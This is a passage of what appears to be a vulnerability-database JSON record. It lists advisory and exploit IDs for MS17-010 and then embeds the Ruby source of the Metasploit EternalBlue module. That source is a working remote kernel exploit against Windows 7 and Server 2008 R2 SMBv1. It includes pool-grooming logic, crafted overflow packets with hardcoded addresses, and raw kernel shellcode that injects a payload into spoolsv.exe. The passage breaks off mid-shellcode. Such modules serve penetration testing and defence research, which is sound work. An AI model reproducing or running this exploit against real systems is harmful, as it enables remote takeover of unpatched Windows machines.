"RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", 
"1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, 
{"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2020-10-07T20:17:30", "rev": 2}, "score": {"value": 8.1, "vector": "NONE", "modified": "2020-10-07T20:17:30", "rev": 2}}, "objectVersion": "1.5", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/ms17_010_eternalblue.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'ruby_smb'\nrequire 'ruby_smb/smb1/packet'\nrequire 'windows_error'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::DCERPC\n include Msf::Exploit::Remote::CheckModule\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'MS17-010 
EternalBlue SMB Remote Windows Kernel Pool Corruption',\n 'Description' => %q{\n This module is a port of the Equation Group ETERNALBLUE exploit, part of\n the FuzzBunch toolkit released by Shadow Brokers.\n\n There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size\n is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a\n DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow\n is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later\n completed in srvnet!SrvNetWskReceiveComplete.\n\n This exploit, like the original may not trigger 100% of the time, and should be\n run continuously until triggered. It seems like the pool will get hot streaks\n and need a cool down period before the shells rain in again.\n\n The module will attempt to use Anonymous login, by default, to authenticate to perform the\n exploit. If the user supplies credentials in the SMBUser, SMBPass, and SMBDomain options it will use\n those instead.\n\n On some systems, this module may cause system instability and crashes, such as a BSOD or\n a reboot. 
This may be more likely with some payloads.\n },\n\n 'Author' =>\n [\n 'Sean Dillon <sean.dillon@risksense.com>', # @zerosum0x0\n 'Dylan Davis <dylan.davis@risksense.com>', # @jennamagius\n 'Equation Group',\n 'Shadow Brokers',\n 'thelightcosine' # RubySMB refactor and Fallback Credential mode\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['MSB', 'MS17-010'],\n ['CVE', '2017-0143'],\n ['CVE', '2017-0144'],\n ['CVE', '2017-0145'],\n ['CVE', '2017-0146'],\n ['CVE', '2017-0147'],\n ['CVE', '2017-0148'],\n ['URL', 'https://github.com/RiskSense-Ops/MS17-010']\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n 'CheckModule' => 'auxiliary/scanner/smb/smb_ms17_010',\n 'WfsDelay' => 5\n },\n 'Privileged' => true,\n 'Payload' =>\n {\n 'Space' => 2000, # this can be more, needs to be recalculated\n 'EncoderType' => Msf::Encoder::Type::Raw\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [\n 'Windows 7 and Server 2008 R2 (x64) All Service Packs',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'os_patterns' => ['Server 2008 R2', 'Windows 7', 'Windows Embedded Standard 7'],\n 'ep_thl_b' => 0x308, # EPROCESS.ThreadListHead.Blink offset\n 'et_alertable' => 0x4c, # ETHREAD.Alertable offset\n 'teb_acp' => 0x2c8, # TEB.ActivationContextPointer offset\n 'et_tle' => 0x420 # ETHREAD.ThreadListEntry offset\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2017-03-14',\n 'Notes' =>\n {\n 'AKA' => ['ETERNALBLUE']\n }\n )\n )\n\n register_options(\n [\n Opt::RPORT(445),\n OptBool.new('VERIFY_TARGET', [true, 'Check if remote OS matches exploit Target.', true]),\n OptBool.new('VERIFY_ARCH', [true, 'Check if remote architecture matches exploit Target.', true]),\n OptString.new('SMBUser', [false, '(Optional) The username to authenticate as', '']),\n OptString.new('SMBPass', [false, '(Optional) The password for the specified username', '']),\n OptString.new('SMBDomain', [false, '(Optional) The Windows domain to use for authentication', '.'])\n ]\n )\n 
register_advanced_options(\n [\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\n OptString.new('ProcessName', [true, 'Process to inject payload into.', 'spoolsv.exe']),\n OptInt.new('MaxExploitAttempts', [true, 'The number of times to retry the exploit.', 3]),\n OptInt.new('GroomAllocations', [true, 'Initial number of times to groom the kernel pool.', 12]),\n OptInt.new('GroomDelta', [true, 'The amount to increase the groom count by per try.', 5])\n ]\n )\n\n end\n\n class EternalBlueError < StandardError\n end\n\n def exploit\n unless check == CheckCode::Vulnerable || datastore['ForceExploit']\n fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')\n end\n\n begin\n for i in 1..datastore['MaxExploitAttempts']\n grooms = datastore['GroomAllocations'] + datastore['GroomDelta'] * (i - 1)\n smb_eternalblue(datastore['ProcessName'], grooms)\n\n # we don't need this sleep, and need to find a way to remove it\n # problem is session_count won't increment until stage is complete :\\\n secs = 0\n while !session_created? && (secs < 30)\n secs += 1\n sleep 1\n end\n\n if session_created?\n print_good('=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=')\n print_good('=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=')\n print_good('=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=')\n break\n else\n print_bad('=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=')\n print_bad('=-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=')\n print_bad('=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=')\n end\n end\n rescue EternalBlueError => e\n print_error(e.message.to_s)\n return false\n rescue ::RubySMB::Error::NegotiationFailure\n print_error('SMB Negotiation Failure -- this often occurs when lsass crashes. 
The target may reboot in 60 seconds.')\n return false\n rescue ::RubySMB::Error::UnexpectedStatusCode,\n ::Errno::ECONNRESET,\n ::Rex::HostUnreachable,\n ::Rex::ConnectionTimeout,\n ::Rex::ConnectionRefused,\n ::RubySMB::Error::CommunicationError => e\n print_error(\"#{e.class}: #{e.message}\")\n report_failure\n return false\n rescue StandardError => e\n print_error(e.class.to_s)\n print_error(e.message)\n print_error(e.backtrace.join(\"\\n\"))\n return false\n ensure\n # pass\n end\n end\n\n def smb_eternalblue(process_name, grooms)\n begin\n # Step 0: pre-calculate what we can\n shellcode = make_kernel_user_payload(payload.encode, process_name, 0, 0, 0, 0)\n payload_hdr_pkt = make_smb2_payload_headers_packet\n payload_body_pkt = make_smb2_payload_body_packet(shellcode)\n\n # Step 1: Connect to IPC$ share\n print_status('Connecting to target for exploitation.')\n client, tree, sock, os = smb1_anonymous_connect_ipc\n rescue RubySMB::Error::CommunicationError\n # Error handler in case SMBv1 disabled on target\n raise EternalBlueError, 'Could not make SMBv1 connection'\n else\n print_good('Connection established for exploitation.')\n\n if verify_target(os)\n print_good('Target OS selected valid for OS indicated by SMB reply')\n else\n print_warning('Target OS selected not valid for OS indicated by SMB reply')\n print_warning('Disable VerifyTarget option to proceed manually...')\n raise EternalBlueError, 'Unable to continue with improper OS Target.'\n end\n\n # cool buffer print no matter what, will be helpful when people post debug issues\n print_core_buffer(os)\n\n if verify_arch\n print_good('Target arch selected valid for arch indicated by DCE/RPC reply')\n else\n print_warning('Target arch selected not valid for arch indicated by DCE/RPC reply')\n print_warning('Disable VerifyArch option to proceed manually...')\n raise EternalBlueError, 'Unable to continue with improper OS Arch.'\n end\n\n print_status(\"Trying exploit with #{grooms} Groom Allocations.\")\n\n # 
Step 2: Create a large SMB1 buffer\n print_status('Sending all but last fragment of exploit packet')\n smb1_large_buffer(client, tree, sock)\n\n # Step 3: Groom the pool with payload packets, and open/close SMB1 packets\n print_status('Starting non-paged pool grooming')\n\n # initialize_groom_threads(ip, port, payload, grooms)\n fhs_sock = smb1_free_hole(true)\n\n @groom_socks = []\n\n print_good('Sending SMBv2 buffers')\n smb2_grooms(grooms, payload_hdr_pkt)\n\n fhf_sock = smb1_free_hole(false)\n\n print_good('Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.')\n fhs_sock.shutdown\n\n print_status('Sending final SMBv2 buffers.') # 6x\n smb2_grooms(6, payload_hdr_pkt) # TODO: magic #\n\n fhf_sock.shutdown\n\n print_status('Sending last fragment of exploit packet!')\n final_exploit_pkt = make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_exploit, 15)\n sock.put(final_exploit_pkt)\n\n print_status('Receiving response from exploit packet')\n code, raw = smb1_get_response(sock)\n\n code_str = '0x' + code.to_i.to_s(16).upcase\n if code.nil?\n print_error('Did not receive a response from exploit packet')\n elsif code == 0xc000000d # STATUS_INVALID_PARAMETER (0xC000000D)\n print_good(\"ETERNALBLUE overwrite completed successfully (#{code_str})!\")\n else\n print_warning(\"ETERNALBLUE overwrite returned unexpected status code (#{code_str})!\")\n end\n\n # Step 4: Send the payload\n print_status('Sending egg to corrupted connection.')\n\n @groom_socks.each { |gsock| gsock.put(payload_body_pkt.first(2920)) }\n @groom_socks.each { |gsock| gsock.put(payload_body_pkt[2920..(4204 - 0x84)]) }\n\n print_status('Triggering free of corrupted buffer.')\n # tree disconnect\n # logoff and x\n # note: these aren't necessary, just close the sockets\n return true\n ensure\n abort_sockets\n end\n end\n\n def verify_target(os)\n os = os.gsub(\"\\x00\", '') # strip unicode bs\n os << \"\\x00\" # but original has a null\n ret = true\n\n if 
datastore['VerifyTarget']\n ret = false\n # search if its in patterns\n target['os_patterns'].each do |pattern|\n if os.downcase.include? pattern.downcase\n ret = true\n break\n end\n end\n end\n\n return ret\n end\n\n def verify_arch\n return true unless datastore['VerifyArch']\n\n # XXX: This sends a new DCE/RPC packet\n arch = dcerpc_getarch\n\n return true if arch && arch == target_arch.first\n\n print_warning(\"Target arch is #{target_arch.first}, but server returned #{arch.inspect}\")\n print_warning('The DCE/RPC service or probe may be blocked') if arch.nil?\n false\n end\n\n def print_core_buffer(os)\n print_status(\"CORE raw buffer dump (#{os.length} bytes)\")\n\n count = 0\n chunks = os.scan(/.{1,16}/)\n chunks.each do |chunk|\n hexdump = chunk.chars.map { |ch| ch.ord.to_s(16).rjust(2, '0') }.join(' ')\n\n format = format('0x%08x %-47s %-16s', (count * 16), hexdump, chunk)\n print_status(format)\n count += 1\n end\n end\n\n '''\n #\n # Increase the default delay by five seconds since some kernel-mode\n # payloads may not run immediately.\n #\n def wfs_delay\n super + 5\n end\n '''\n\n def smb2_grooms(grooms, payload_hdr_pkt)\n grooms.times do |_groom_id|\n gsock = connect(false)\n @groom_socks << gsock\n gsock.put(payload_hdr_pkt)\n end\n end\n\n def smb1_anonymous_connect_ipc\n sock = connect(false)\n dispatcher = RubySMB::Dispatcher::Socket.new(sock)\n client = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, smb3: false, username: smb_user, domain: smb_domain, password: smb_pass)\n response_code = client.login\n\n unless response_code == ::WindowsError::NTStatus::STATUS_SUCCESS\n raise RubySMB::Error::UnexpectedStatusCode, \"Error with login: #{response_code}\"\n end\n\n os = client.peer_native_os\n\n tree = client.tree_connect(\"\\\\\\\\#{datastore['RHOST']}\\\\IPC$\")\n\n return client, tree, sock, os\n end\n\n def smb1_large_buffer(client, tree, sock)\n nt_trans_pkt = make_smb1_nt_trans_packet(tree.id, client.user_id)\n\n # send NT Trans\n 
vprint_status('Sending NT Trans Request packet')\n\n client.send_recv(nt_trans_pkt)\n # Initial Trans2 request\n trans2_pkt_nulled = make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_zero, 0)\n\n # send all but last packet\n for i in 1..14\n trans2_pkt_nulled << make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_buffer, i)\n end\n\n vprint_status('Sending malformed Trans2 packets')\n sock.put(trans2_pkt_nulled)\n\n begin\n sock.get_once\n rescue EOFError\n vprint_error('No response back from SMB echo request. Continuing anyway...')\n end\n\n client.echo(count: 1, data: \"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x00\")\n end\n\n def smb1_free_hole(start)\n sock = connect(false)\n dispatcher = RubySMB::Dispatcher::Socket.new(sock)\n client = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, smb3: false, username: smb_user, domain: smb_domain, password: smb_pass)\n client.negotiate\n\n pkt = ''\n\n if start\n vprint_status('Sending start free hole packet.')\n pkt = make_smb1_free_hole_session_packet(\"\\x07\\xc0\", \"\\x2d\\x01\", \"\\xf0\\xff\\x00\\x00\\x00\")\n else\n vprint_status('Sending end free hole packet.')\n pkt = make_smb1_free_hole_session_packet(\"\\x07\\x40\", \"\\x2c\\x01\", \"\\xf8\\x87\\x00\\x00\\x00\")\n end\n\n client.send_recv(pkt)\n sock\n end\n\n def smb1_get_response(sock)\n raw = nil\n\n # dirty hack since it doesn't always like to reply the first time...\n 16.times do\n raw = sock.get_once\n break unless raw.nil? 
|| raw.empty?\n end\n\n return nil unless raw\n\n response = RubySMB::SMB1::SMBHeader.read(raw[4..-1])\n code = response.nt_status\n return code, raw, response\n end\n\n def make_smb2_payload_headers_packet\n # don't need a library here, the packet is essentially nonsensical\n pkt = ''\n pkt << \"\\x00\" # session message\n pkt << \"\\x00\\xff\\xf7\" # size\n pkt << \"\\xfeSMB\" # SMB2\n pkt << \"\\x00\" * 124\n\n pkt\n end\n\n def make_smb2_payload_body_packet(kernel_user_payload)\n # precalculated lengths\n pkt_max_len = 4204\n pkt_setup_len = 497\n pkt_max_payload = pkt_max_len - pkt_setup_len # 3575\n\n # this packet holds padding, KI_USER_SHARED_DATA addresses, and shellcode\n pkt = ''\n\n # padding\n pkt << \"\\x00\" * 0x8\n pkt << \"\\x03\\x00\\x00\\x00\"\n pkt << \"\\x00\" * 0x1c\n pkt << \"\\x03\\x00\\x00\\x00\"\n pkt << \"\\x00\" * 0x74\n\n # KI_USER_SHARED_DATA addresses\n pkt << \"\\xb0\\x00\\xd0\\xff\\xff\\xff\\xff\\xff\" * 2 # x64 address\n pkt << \"\\x00\" * 0x10\n pkt << \"\\xc0\\xf0\\xdf\\xff\" * 2 # x86 address\n pkt << \"\\x00\" * 0xc4\n\n # payload addreses\n pkt << \"\\x90\\xf1\\xdf\\xff\"\n pkt << \"\\x00\" * 0x4\n pkt << \"\\xf0\\xf1\\xdf\\xff\"\n pkt << \"\\x00\" * 0x40\n\n pkt << \"\\xf0\\x01\\xd0\\xff\\xff\\xff\\xff\\xff\"\n pkt << \"\\x00\" * 0x8\n pkt << \"\\x00\\x02\\xd0\\xff\\xff\\xff\\xff\\xff\"\n pkt << \"\\x00\"\n\n pkt << kernel_user_payload\n\n # fill out the rest, this can be randomly generated\n pkt << \"\\x00\" * (pkt_max_payload - kernel_user_payload.length)\n\n pkt\n end\n\n # Type can be :eb_trans2_zero, :eb_trans2_buffer, or :eb_trans2_exploit\n def make_smb1_trans2_exploit_packet(tree_id, user_id, type, timeout)\n timeout = (timeout * 0x10) + 3\n timeout_value = \"\\x35\\x00\\xd0\" + timeout.chr\n\n packet = RubySMB::SMB1::Packet::Trans2::Request.new\n packet = set_smb1_headers(packet, tree_id, user_id)\n\n # The packets are labeled as Secondary Requests but are actually structured\n # as normal Trans2 Requests for some 
reason. We shall similarly cheat here.\n packet.smb_header.command = RubySMB::SMB1::Commands::SMB_COM_TRANSACTION2_SECONDARY\n\n packet.parameter_block.flags.read(\"\\x00\\x10\")\n packet.parameter_block.timeout.read(timeout_value)\n\n packet.parameter_block.word_count = 9\n packet.parameter_block.total_data_count = 4096\n packet.parameter_block.parameter_count = 4096\n\n nbss = \"\\x00\\x00\\x10\\x35\"\n pkt = packet.to_binary_s\n pkt = pkt[0, packet.parameter_block.parameter_offset.abs_offset]\n pkt = nbss + pkt\n\n case type\n when :eb_trans2_exploit\n vprint_status('Making :eb_trans2_exploit packet')\n\n pkt << \"\\x41\" * 2957\n\n pkt << \"\\x80\\x00\\xa8\\x00\" # overflow\n\n pkt << \"\\x00\" * 0x10\n pkt << \"\\xff\\xff\"\n pkt << \"\\x00\" * 0x6\n pkt << \"\\xff\\xff\"\n pkt << \"\\x00\" * 0x16\n\n pkt << \"\\x00\\xf1\\xdf\\xff\" # x86 addresses\n pkt << \"\\x00\" * 0x8\n pkt << \"\\x20\\xf0\\xdf\\xff\"\n\n pkt << \"\\x00\\xf1\\xdf\\xff\\xff\\xff\\xff\\xff\" # x64\n\n pkt << \"\\x60\\x00\\x04\\x10\"\n pkt << \"\\x00\" * 4\n\n pkt << \"\\x80\\xef\\xdf\\xff\"\n\n pkt << \"\\x00\" * 4\n pkt << \"\\x10\\x00\\xd0\\xff\\xff\\xff\\xff\\xff\"\n pkt << \"\\x18\\x01\\xd0\\xff\\xff\\xff\\xff\\xff\"\n pkt << \"\\x00\" * 0x10\n\n pkt << \"\\x60\\x00\\x04\\x10\"\n pkt << \"\\x00\" * 0xc\n pkt << \"\\x90\\xff\\xcf\\xff\\xff\\xff\\xff\\xff\"\n pkt << \"\\x00\" * 0x8\n pkt << \"\\x80\\x10\"\n pkt << \"\\x00\" * 0xe\n pkt << \"\\x39\"\n pkt << \"\\xbb\"\n\n pkt << \"\\x41\" * 965\n when :eb_trans2_zero\n vprint_status('Making :eb_trans2_zero packet')\n pkt << \"\\x00\" * 2055\n pkt << \"\\x83\\xf3\"\n pkt << \"\\x41\" * 2039\n else\n vprint_status('Making :eb_trans2_buffer packet')\n pkt << \"\\x41\" * 4096\n end\n pkt\n end\n\n def make_smb1_nt_trans_packet(tree_id, user_id)\n packet = RubySMB::SMB1::Packet::NtTrans::Request.new\n\n # Disable the automatic padding because it will distort\n # our values here.\n packet.data_block.enable_padding = false\n\n packet = 
set_smb1_headers(packet, tree_id, user_id)\n\n packet.parameter_block.max_setup_count = 1\n packet.parameter_block.total_parameter_count = 30\n packet.parameter_block.total_data_count = 66512\n packet.parameter_block.max_parameter_count = 30\n packet.parameter_block.max_data_count = 0\n packet.parameter_block.parameter_count = 30\n packet.parameter_block.parameter_offset = 75\n packet.parameter_block.data_count = 976\n packet.parameter_block.data_offset = 104\n packet.parameter_block.function = 0\n\n packet.parameter_block.setup << 0x0000\n\n packet.data_block.byte_count = 1004\n packet.data_block.trans2_parameters = \"\\x00\" * 31 + \"\\x01\" + (\"\\x00\" * 973)\n packet\n end\n\n def make_smb1_free_hole_session_packet(flags2, vcnum, native_os)\n packet = RubySMB::SMB1::Packet::SessionSetupRequest.new\n\n packet.smb_header.flags.read(\"\\x18\")\n packet.smb_header.flags2.read(flags2)\n packet.smb_header.pid_high = 65279\n packet.smb_header.mid = 64\n\n packet.parameter_block.vc_number.read(vcnum)\n packet.parameter_block.max_buffer_size = 4356\n packet.parameter_block.max_mpx_count = 10\n packet.parameter_block.security_blob_length = 0\n\n packet.data_block.native_os = native_os\n packet.data_block.native_lan_man = \"\\x00\" * 17\n packet\n end\n\n # ring3 = user mode encoded payload\n # proc_name = process to inject APC into\n # ep_thl_b = EPROCESS.ThreadListHead.Blink offset\n # et_alertable = ETHREAD.Alertable offset\n # teb_acp = TEB.ActivationContextPointer offset\n # et_tle = ETHREAD.ThreadListEntry offset\n def make_kernel_user_payload(ring3, proc_name, _ep_thl_b, _et_alertable, _teb_acp, _et_tle)\n sc = make_kernel_shellcode(proc_name)\n sc << [ring3.length].pack('S<')\n sc << ring3\n sc\n end\n\n def generate_process_hash(process)\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n proc_hash = 0\n process << \"\\x00\"\n process.each_byte do |c|\n proc_hash = ror(proc_hash, 13)\n proc_hash += c\n end\n 
[proc_hash].pack('l<')\n end\n\n def ror(dword, bits)\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\n end\n\n def make_kernel_shellcode(proc_name)\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n # Length: 1019 bytes\n\n # \"\\xcc\"+\n \"\\x31\\xC9\\x41\\xE2\\x01\\xC3\\xB9\\x82\\x00\\x00\\xC0\\x0F\\x32\\x48\\xBB\\xF8\" \\\n \"\\x0F\\xD0\\xFF\\xFF\\xFF\\xFF\\xFF\\x89\\x53\\x04\\x89\\x03\\x48\\x8D\\x05\\x0A\" \\\n \"\\x00\\x00\\x00\\x48\\x89\\xC2\\x48\\xC1\\xEA\\x20\\x0F\\x30\\xC3\\x0F\\x01\\xF8\" \\\n \"\\x65\\x48\\x89\\x24\\x25\\x10\\x00\\x00\\x00\\x65\\x48\\x8B\\x24\\x25\\xA8\\x01\" \\\n \"\\x00\\x00\\x50\\x53\\x51\\x52\\x56\\x57\\x55\\x41\\x50\\x41\\x51\\x41\\x52\\x41\" \\\n \"\\x53\\x41\\x54\\x41\\x55\\x41\\x56\\x41\\x57\\x6A\\x2B\\x65\\xFF\\x34\\x25\\x10\" \\\n \"\\x00\\x00\\x00\\x41\\x53\\x6A\\x33\\x51\\x4C\\x89\\xD1\\x48\\x83\\xEC\\x08\\x55\" \\\n \"\\x48\\x81\\xEC\\x58\\x01\\x00\\x00\\x48\\x8D\\xAC\\x24\\x80\\x00\\x00\\x00\\x48\" \\\n \"\\x89\\x9D\\xC0\\x00\\x00\\x00\\x48\\x89\\xBD\\xC8\\x00\\x00\\x00\\x48\\x89\\xB5\" \\\n \"\\xD0\\x00\\x00\\x00\\x48\\xA1\\xF8\\x0F\\xD0\\xFF\\xFF\\xFF\\xFF\\xFF\\x48\\x89\" \\\n \"\\xC2\\x48\\xC1\\xEA\\x20\\x48\\x31\\xDB\\xFF\\xCB\\x48\\x21\\xD8\\xB9\\x82\\x00\" \\\n \"\\x00\\xC0\\x0F\\x30\\xFB\\xE8\\x38\\x00\\x00\\x00\\xFA\\x65\\x48\\x8B\\x24\\x25\" \\\n \"\\xA8\\x01\\x00\\x00\\x48\\x83\\xEC\\x78\\x41\\x5F\\x41\\x5E\\x41\\x5D\\x41\\x5C\" \\\n \"\\x41\\x5B\\x41\\x5A\\x41\\x59\\x41\\x58\\x5D\\x5F\\x5E\\x5A\\x59\\x5B\\x58\\x65\" \\\n \"\\x48\\x8B\\x24\\x25\\x10\\x00\\x00\\x00\\x0F\\x01\\xF8\\xFF\\x24\\x25\\xF8\\x0F\" \\\n \"\\xD0\\xFF\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\\x55\\x48\\x89\\xE5\" \\\n \"\\x66\\x83\\xE4\\xF0\\x48\\x83\\xEC\\x20\\x4C\\x8D\\x35\\xE3\\xFF\\xFF\\xFF\\x65\" \\\n \"\\x4C\\x8B\\x3C\\x25\\x38\\x00\\x00\\x00\\x4D\\x8B\\x7F\\x04\\x49\\xC1\\xEF\\x0C\" \\\n \"\\x49\\xC1\\xE7\\x0C\\x49\\x81\\xEF\\x00\\x10\\x00\\x00\\x49\\x8B\\x37\\x66\\x81\" \\\n 
\"\\xFE\\x4D\\x5A\\x75\\xEF\\x41\\xBB\\x5C\\x72\\x11\\x62\\xE8\\x18\\x02\\x00\\x00\" \\\n \"\\x48\\x89\\xC6\\x48\\x81\\xC6\\x08\\x03\\x00\\x00\\x41\\xBB\\x7A\\xBA\\xA3\\x30\" \\\n \"\\xE8\\x03\\x02\\x00\\x00\\x48\\x89\\xF1\\x48\\x39\\xF0\\x77\\x11\\x48\\x8D\\x90\" \\\n \"\\x00\\x05\\x00\\x00\\x48\\x39\\xF2\\x72\\x05\\x48\\x29\\xC6\\xEB\\x08\\x48\\x8B\" \\\n \"\\x36\\x48\\x39\\xCE\\x75\\xE2\\x49\\x89\\xF4\\x31\\xDB\\x89\\xD9\\x83\\xC1\\x04\" \\\n \"\\x81\\xF9\\x00\\x00\\x01\\x00\\x0F\\x8D\\x66\\x01\\x00\\x00\\x4C\\x89\\xF2\\x89\" \\\n \"\\xCB\\x41\\xBB\\x66\\x55\\xA2\\x4B\\xE8\\xBC\\x01\\x00\\x00\\x85\\xC0\\x75\\xDB\" \\\n \"\\x49\\x8B\\x0E\\x41\\xBB\\xA3\\x6F\\x72\\x2D\\xE8\\xAA\\x01\\x00\\x00\\x48\\x89\" \\\n \"\\xC6\\xE8\\x50\\x01\\x00\\x00\\x41\\x81\\xF9\" + generate_process_hash(proc_name.upcase) + \"\\x75\\xBC\\x49\" \\\n \"\\x8B\\x1E\\x4D\\x8D\\x6E\\x10\\x4C\\x89\\xEA\\x48\\x89\\xD9\\x41\\xBB\\xE5\\x24\" \\\n \"\\x11\\xDC\\xE8\\x81\\x01\\x00\\x00\\x6A\\x40\\x68\\x00\\x10\\x00\\x00\\x4D\\x8D\" \\\n \"\\x4E\\x08\\x49\\xC7\\x01\\x00\\x10\\x00\\x00\\x4D\\x31\\xC0\\x4C\\x89\\xF2\\x31\" \\\n \"\\xC9\\x48\\x89\\x0A\\x48\\xF7\\xD1\\x41\\xBB\\x4B\\xCA\\x0A\\xEE\\x48\\x83\\xEC\" \\\n \"\\x20\\xE8\\x52\\x01\\x00\\x00\\x85\\xC0\\x0F\\x85\\xC8\\x00\\x00\\x00\\x49\\x8B\" \\\n 